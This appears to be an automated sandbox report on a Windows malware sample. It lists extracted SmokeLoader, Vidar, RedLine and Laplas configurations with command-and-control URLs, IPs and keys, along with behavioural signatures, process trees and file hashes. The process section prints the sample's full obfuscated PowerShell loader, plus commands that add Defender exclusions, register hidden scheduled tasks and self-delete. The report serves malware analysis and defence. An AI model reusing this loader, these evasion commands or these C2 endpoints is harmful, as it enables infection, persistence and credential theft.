Analysis
-
max time kernel
67s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
22-04-2023 21:01
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20230220-en
General
-
Target
tmp.exe
-
Size
234KB
-
MD5
068cc6785e0eccc6e37f1dd67ffcf6f0
-
SHA1
fcfb12625183cad04ce2832f9c29908baa8039dc
-
SHA256
fc51e907d00e4bc82fda5bfec4b227e5ebf9c5ecce4acebaa24f17ecdfe5ebe8
-
SHA512
27dd069bd3871277e0527b1e9a12ad99986b7b3e9a0451c3109d64a8280eb1ff169c0e5964b7b0f6306237d6b161bfe5bde7773d6f3d42e5ba84cfba12921cf9
-
SSDEEP
3072:jPNKDILIsTh2BZxOq5APDiYbNL4pW95hbfp1I:d8sThaxOyAPLbNL42bfp1I
Malware Config
Extracted
smokeloader
sprg
Extracted
smokeloader
2022
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
vidar
3.5
2234cb18bdcd93ea6f4e5f1473025a81
https://steamcommunity.com/profiles/76561199497218285
https://t.me/tg_duckworld
-
profile_id_v2
2234cb18bdcd93ea6f4e5f1473025a81
-
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7
Extracted
redline
special
176.123.9.142:14845
-
auth_value
bb28ee957fad348ef1dfce97134849bc
Extracted
laplas
http://89.23.97.128
-
api_key
bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 13209177496868571162.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 13209177496868571162.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 13209177496868571162.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation E4A8.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation 42A7.bat.exe -
Executes dropped EXE 4 IoCs
pid Process 4400 E4A8.exe 764 13209177496868571162.exe 4964 42A7.bat.exe 3804 40119698600278112559.exe -
Loads dropped DLL 2 IoCs
pid Process 4400 E4A8.exe 4400 E4A8.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0002000000022cf3-286.dat upx behavioral2/files/0x0002000000022cf3-289.dat upx behavioral2/files/0x0002000000022cf3-288.dat upx behavioral2/memory/3804-290-0x0000000000570000-0x00000000013D4000-memory.dmp upx behavioral2/memory/3804-291-0x0000000000570000-0x00000000013D4000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" 13209177496868571162.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 13209177496868571162.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 764 13209177496868571162.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3312 4400 WerFault.exe 93 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tmp.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tmp.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 E4A8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString E4A8.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3132 timeout.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 126 Go-http-client/1.1 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3804 tmp.exe 3804 tmp.exe 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3136 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3804 tmp.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeDebugPrivilege 4964 42A7.bat.exe Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeDebugPrivilege 2132 powershell.exe Token: SeDebugPrivilege 4204 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 3136 wrote to memory of 4400 3136 Process not Found 93 PID 3136 wrote to memory of 4400 3136 Process not Found 93 PID 3136 wrote to memory of 4400 3136 Process not Found 93 PID 4400 wrote to memory of 764 4400 E4A8.exe 94 PID 4400 wrote to memory of 764 4400 E4A8.exe 94 PID 3136 wrote to memory of 3656 3136 Process not Found 96 PID 3136 wrote to memory of 3656 3136 Process not Found 96 PID 3656 wrote to memory of 4504 3656 cmd.exe 98 PID 3656 wrote to memory of 4504 3656 cmd.exe 98 PID 4504 wrote to memory of 4964 4504 cmd.exe 100 PID 4504 wrote to memory of 4964 4504 cmd.exe 100 PID 4504 wrote to memory of 4964 4504 cmd.exe 100 PID 4400 wrote to memory of 3804 4400 E4A8.exe 101 PID 4400 wrote to memory of 3804 4400 E4A8.exe 101 PID 3804 wrote to memory of 3816 3804 40119698600278112559.exe 102 PID 3804 wrote to memory of 3816 3804 40119698600278112559.exe 102 PID 4400 wrote to memory of 3352 4400 E4A8.exe 104 PID 4400 wrote to memory of 3352 4400 E4A8.exe 104 PID 4400 wrote to memory of 3352 4400 E4A8.exe 104 PID 3816 wrote to memory of 1524 3816 cmd.exe 108 PID 3816 wrote to memory of 1524 3816 cmd.exe 108 PID 3352 wrote to memory of 3132 3352 cmd.exe 109 PID 3352 wrote to memory of 3132 3352 cmd.exe 109 PID 3352 wrote to memory of 3132 3352 cmd.exe 109 PID 4964 wrote to memory of 2132 4964 42A7.bat.exe 111 PID 4964 wrote to memory of 2132 4964 42A7.bat.exe 111 PID 4964 wrote to memory of 2132 4964 42A7.bat.exe 111 PID 4964 wrote to memory of 4204 4964 42A7.bat.exe 113 PID 4964 wrote to memory of 4204 4964 42A7.bat.exe 113 PID 4964 wrote to memory of 4204 4964 42A7.bat.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3804
-
C:\Users\Admin\AppData\Local\Temp\E4A8.exeC:\Users\Admin\AppData\Local\Temp\E4A8.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\ProgramData\13209177496868571162.exe"C:\ProgramData\13209177496868571162.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:764 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe3⤵PID:4244
-
-
-
C:\ProgramData\40119698600278112559.exe"C:\ProgramData\40119698600278112559.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\40119698600278112559.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 04⤵PID:1524
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E4A8.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:3132
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 21162⤵
- Program crash
PID:3312
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\42A7.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\42A7.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Users\Admin\AppData\Local\Temp\42A7.bat.exe"C:\Users\Admin\AppData\Local\Temp\42A7.bat.exe" -w hidden -c $Yhss='COBPTreaOBPTteOBPTDecOBPTryOBPTptOBPTorOBPT'.Replace('OBPT', '');$CYDS='MOBPTainMOBPToduOBPTlOBPTeOBPT'.Replace('OBPT', '');$Lvkd='TraOBPTnOBPTsfOBPTormOBPTFinOBPTalOBPTBlOBPToOBPTckOBPT'.Replace('OBPT', '');$oRgU='FiOBPTrOBPTstOBPT'.Replace('OBPT', '');$XmlI='SpOBPTlitOBPT'.Replace('OBPT', '');$oNkQ='GeOBPTtCOBPTuOBPTrrOBPTentOBPTPOBPTroOBPTcOBPTesOBPTsOBPT'.Replace('OBPT', '');$ZQpO='EnOBPTtOBPTrOBPTyOBPTPoiOBPTnOBPTtOBPT'.Replace('OBPT', '');$wkxV='ChanOBPTgeEOBPTxteOBPTnsiOBPTonOBPT'.Replace('OBPT', '');$DpWU='LoaOBPTdOBPT'.Replace('OBPT', '');$tmSV='InOBPTvOBPTokOBPTeOBPT'.Replace('OBPT', '');$qrdA='ReadOBPTLiOBPTnesOBPT'.Replace('OBPT', '');$ujLd='FrOBPTomBOBPTasOBPTe64OBPTSOBPTtrOBPTingOBPT'.Replace('OBPT', '');function YwbRc($LbUAF){$VKueZ=[System.Security.Cryptography.Aes]::Create();$VKueZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VKueZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VKueZ.Key=[System.Convert]::$ujLd('W9fChbBVxve7XC6gEtL6ycNU/d+U1Givk93frR5IDQs=');$VKueZ.IV=[System.Convert]::$ujLd('udmMANy4uNJ7yFspg1Rrzw==');$JKnul=$VKueZ.$Yhss();$dzRYO=$JKnul.$Lvkd($LbUAF,0,$LbUAF.Length);$JKnul.Dispose();$VKueZ.Dispose();$dzRYO;}function jClid($LbUAF){$qfZKy=New-Object System.IO.MemoryStream(,$LbUAF);$DgUOH=New-Object System.IO.MemoryStream;$xPkWq=New-Object System.IO.Compression.GZipStream($qfZKy,[IO.Compression.CompressionMode]::Decompress);$xPkWq.CopyTo($DgUOH);$xPkWq.Dispose();$qfZKy.Dispose();$DgUOH.Dispose();$DgUOH.ToArray();}$YiUaM=[System.Linq.Enumerable]::$oRgU([System.IO.File]::$qrdA([System.IO.Path]::$wkxV([System.Diagnostics.Process]::$oNkQ().$CYDS.FileName, $null)));$XdmBJ=$YiUaM.Substring(3).$XmlI(':');$wIgfY=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[0])));$eAKZo=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[1])));[System.Reflection.Assembly]::$DpWU([byte[]]$eAKZo).$ZQpO.$tmSV($null,$null);[System.Reflection.Assembly]::$DpWU([byte[]]$wIgfY).$ZQpO.$tmSV($null,$null);3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4964);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4204
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\42A7')4⤵PID:1328
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_olTsz' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\olTsz.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵PID:4948
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\olTsz.vbs"4⤵PID:544
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\olTsz.bat" "5⤵PID:4520
-
C:\Users\Admin\AppData\Roaming\olTsz.bat.exe"C:\Users\Admin\AppData\Roaming\olTsz.bat.exe" -w hidden -c $Yhss='COBPTreaOBPTteOBPTDecOBPTryOBPTptOBPTorOBPT'.Replace('OBPT', '');$CYDS='MOBPTainMOBPToduOBPTlOBPTeOBPT'.Replace('OBPT', '');$Lvkd='TraOBPTnOBPTsfOBPTormOBPTFinOBPTalOBPTBlOBPToOBPTckOBPT'.Replace('OBPT', '');$oRgU='FiOBPTrOBPTstOBPT'.Replace('OBPT', '');$XmlI='SpOBPTlitOBPT'.Replace('OBPT', '');$oNkQ='GeOBPTtCOBPTuOBPTrrOBPTentOBPTPOBPTroOBPTcOBPTesOBPTsOBPT'.Replace('OBPT', '');$ZQpO='EnOBPTtOBPTrOBPTyOBPTPoiOBPTnOBPTtOBPT'.Replace('OBPT', '');$wkxV='ChanOBPTgeEOBPTxteOBPTnsiOBPTonOBPT'.Replace('OBPT', '');$DpWU='LoaOBPTdOBPT'.Replace('OBPT', '');$tmSV='InOBPTvOBPTokOBPTeOBPT'.Replace('OBPT', '');$qrdA='ReadOBPTLiOBPTnesOBPT'.Replace('OBPT', '');$ujLd='FrOBPTomBOBPTasOBPTe64OBPTSOBPTtrOBPTingOBPT'.Replace('OBPT', '');function YwbRc($LbUAF){$VKueZ=[System.Security.Cryptography.Aes]::Create();$VKueZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VKueZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VKueZ.Key=[System.Convert]::$ujLd('W9fChbBVxve7XC6gEtL6ycNU/d+U1Givk93frR5IDQs=');$VKueZ.IV=[System.Convert]::$ujLd('udmMANy4uNJ7yFspg1Rrzw==');$JKnul=$VKueZ.$Yhss();$dzRYO=$JKnul.$Lvkd($LbUAF,0,$LbUAF.Length);$JKnul.Dispose();$VKueZ.Dispose();$dzRYO;}function jClid($LbUAF){$qfZKy=New-Object System.IO.MemoryStream(,$LbUAF);$DgUOH=New-Object System.IO.MemoryStream;$xPkWq=New-Object System.IO.Compression.GZipStream($qfZKy,[IO.Compression.CompressionMode]::Decompress);$xPkWq.CopyTo($DgUOH);$xPkWq.Dispose();$qfZKy.Dispose();$DgUOH.Dispose();$DgUOH.ToArray();}$YiUaM=[System.Linq.Enumerable]::$oRgU([System.IO.File]::$qrdA([System.IO.Path]::$wkxV([System.Diagnostics.Process]::$oNkQ().$CYDS.FileName, $null)));$XdmBJ=$YiUaM.Substring(3).$XmlI(':');$wIgfY=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[0])));$eAKZo=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[1])));[System.Reflection.Assembly]::$DpWU([byte[]]$eAKZo).$ZQpO.$tmSV($null,$null);[System.Reflection.Assembly]::$DpWU([byte[]]$wIgfY).$ZQpO.$tmSV($null,$null);6⤵PID:1288
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1288);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵PID:1580
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')7⤵PID:5092
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\olTsz')7⤵PID:4760
-
-
C:\Users\Admin\AppData\Local\Temp\m1otqdb1.m51.exe"C:\Users\Admin\AppData\Local\Temp\m1otqdb1.m51.exe"7⤵PID:1976
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1976);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵PID:3852
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4400 -ip 44001⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\D62E.exeC:\Users\Admin\AppData\Local\Temp\D62E.exe1⤵PID:3408
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"2⤵PID:5096
-
-
C:\Users\Admin\AppData\Local\Temp\A10.exeC:\Users\Admin\AppData\Local\Temp\A10.exe1⤵PID:812
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:896
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:712
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1324
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3252
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3928
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1184
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4352
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5016
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4396
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.0MB
MD5e81570d802d26df3dde953770c8c9766
SHA1d8df423343b59f8b53f10722b023622477e5fb31
SHA256e1290a9463ef7d1d61645b7d3fd3e4a7518023091f85ab4085308f70d437707f
SHA5121d03bc26a97b4eb680fe9d1996c525e086f6efcb40db2946e7297544a85cd0b6999ac03ed11048dc424631a643ba95a0624865351e86fb76ebc61641c73b7778
-
Filesize
3.0MB
MD5e81570d802d26df3dde953770c8c9766
SHA1d8df423343b59f8b53f10722b023622477e5fb31
SHA256e1290a9463ef7d1d61645b7d3fd3e4a7518023091f85ab4085308f70d437707f
SHA5121d03bc26a97b4eb680fe9d1996c525e086f6efcb40db2946e7297544a85cd0b6999ac03ed11048dc424631a643ba95a0624865351e86fb76ebc61641c73b7778
-
Filesize
3.0MB
MD5e81570d802d26df3dde953770c8c9766
SHA1d8df423343b59f8b53f10722b023622477e5fb31
SHA256e1290a9463ef7d1d61645b7d3fd3e4a7518023091f85ab4085308f70d437707f
SHA5121d03bc26a97b4eb680fe9d1996c525e086f6efcb40db2946e7297544a85cd0b6999ac03ed11048dc424631a643ba95a0624865351e86fb76ebc61641c73b7778
-
Filesize
4.3MB
MD5196a4cdba36b3fe8f82a215732c486b4
SHA19186f53143e01b28af100e1000eb443e6afbe292
SHA256651e80215fee5757287bd028e7cda4a67865f0c6e0cad46c82706bf0e2565478
SHA5125e0fc394e6cf8ee16f1227ebbb3ef02ad17c0da9bbf1c51ebcec4ca9343d6993305b26bf2f8ab0b326a2af87797a6d75bc2c544bf8503f3d55347d47ec159143
-
Filesize
4.3MB
MD5196a4cdba36b3fe8f82a215732c486b4
SHA19186f53143e01b28af100e1000eb443e6afbe292
SHA256651e80215fee5757287bd028e7cda4a67865f0c6e0cad46c82706bf0e2565478
SHA5125e0fc394e6cf8ee16f1227ebbb3ef02ad17c0da9bbf1c51ebcec4ca9343d6993305b26bf2f8ab0b326a2af87797a6d75bc2c544bf8503f3d55347d47ec159143
-
Filesize
4.3MB
MD5196a4cdba36b3fe8f82a215732c486b4
SHA19186f53143e01b28af100e1000eb443e6afbe292
SHA256651e80215fee5757287bd028e7cda4a67865f0c6e0cad46c82706bf0e2565478
SHA5125e0fc394e6cf8ee16f1227ebbb3ef02ad17c0da9bbf1c51ebcec4ca9343d6993305b26bf2f8ab0b326a2af87797a6d75bc2c544bf8503f3d55347d47ec159143
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
18KB
MD549ed0b4990308da94975061df73bcec1
SHA1a3af129458f92851d04546a9fac050539e9abfd1
SHA256254296775610bc66c4e09653eeefa593357b43efc1c9e7e25510a16dbee78144
SHA512b50167d1936896847899bee6ef8f9f20b4aac4474199c05e6d750dadab2c2fe7cbd211dd148f0bd81974de1574fff221ed77055f6e997836e43154452229de03
-
Filesize
20KB
MD5dc14f72d604f762c1d583f517d2ff362
SHA1e0067c138b849cbe7db1820c1c31d78531a3154f
SHA256e5992f2d108a7f83c73dacec3b445076fc558ed8d561fbfc67d3e2f4bc62d6a0
SHA5128229b2d7bc608621274f2b1e6885c07d781b6b708ee5489d35a5dd288ee4e40b6b10a736b86549a0d56c88f231670bf61e2d7b00000600a30f6aca919cb0ce03
-
Filesize
17KB
MD51b0d499310ea45e89efaa3008f992669
SHA145296b861c4ec468231ce1796a993f05d85a1022
SHA25617d22bb709fa04f2b710be5643b014e9bb272aee5ea7c4d5e10209a00d332699
SHA512c3f1db2d7f9bf0bc50bf246c39b7782f868a9cac3d75124f7e331c152b69cf5118095b24185eb10e185739acfc444703e6148e25f1342b1e850ee8dd273d2e47
-
Filesize
17KB
MD51b0d499310ea45e89efaa3008f992669
SHA145296b861c4ec468231ce1796a993f05d85a1022
SHA25617d22bb709fa04f2b710be5643b014e9bb272aee5ea7c4d5e10209a00d332699
SHA512c3f1db2d7f9bf0bc50bf246c39b7782f868a9cac3d75124f7e331c152b69cf5118095b24185eb10e185739acfc444703e6148e25f1342b1e850ee8dd273d2e47
-
Filesize
15KB
MD5d6a1d9af00baa8c6655e42ace7c6b715
SHA1a6a3545c308d72d9ce1e5ce4989e21effae889e9
SHA2565e41bff5dab5b699057f14e66d8aa4c7cdac937cc6564e0941d170ddfb6695b6
SHA512413d75227f8a83599b11de751e914b2f098ea4cb8256a6b032925309a447c85e8d3ce62020b9739f1a0e159f8180abe83af814253c8a61760fffdc0885d1e15b
-
Filesize
18KB
MD5499dd7ca614700611c3c199c07f118f4
SHA1945c76667fa33aa31ebe10984ade6c7ddc756ee5
SHA256feb70cd12029f9fd6c21c933ca81af47539b84a553a6c55eb570bedf4f45221c
SHA51227bbaacfbacd79db6daaded7b2b6898bbc724f2594125f119c34b8f3f01a0cfef9f677fa57ab14df5b3ff188f95623a26ff7a0a500727d5e87136736dc6751de
-
Filesize
16KB
MD5e60c8933bc2e361a18fac8c6109f4c44
SHA18c02bc1ca30a528b38859360797158fe9f667534
SHA2563ba1b5aa7b2e47b1b15dca943f514f25aeb188dff0643777d1402ec04e18bacf
SHA512473d5af55ba15b4f59e50c6b5ffd52e92d15d1a9dfc71322d4e83a61632e00945bb58d9e94cf2251cc30875b8c1ad263e71fc1941de5846cd03df7e4ed271892
-
Filesize
16KB
MD5e60c8933bc2e361a18fac8c6109f4c44
SHA18c02bc1ca30a528b38859360797158fe9f667534
SHA2563ba1b5aa7b2e47b1b15dca943f514f25aeb188dff0643777d1402ec04e18bacf
SHA512473d5af55ba15b4f59e50c6b5ffd52e92d15d1a9dfc71322d4e83a61632e00945bb58d9e94cf2251cc30875b8c1ad263e71fc1941de5846cd03df7e4ed271892
-
Filesize
352KB
MD52115cc47f7ef6e7152e2326de4f32f2a
SHA1ed68fa31b9f635cdeb3a26710c2ec9689dcb8f97
SHA2566ae23d8550d0f10cd34797e5821fd78a2d50236e9f8a931a398f8f26daffbfad
SHA5121c3727cfa39dc010dec742f0f98eba3d881a7802ed59c28b74daa514b71dee8e62e8ba21514ecb2bd9ae3a765b4d029f29ceee1f2865714c10255d6820811012
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
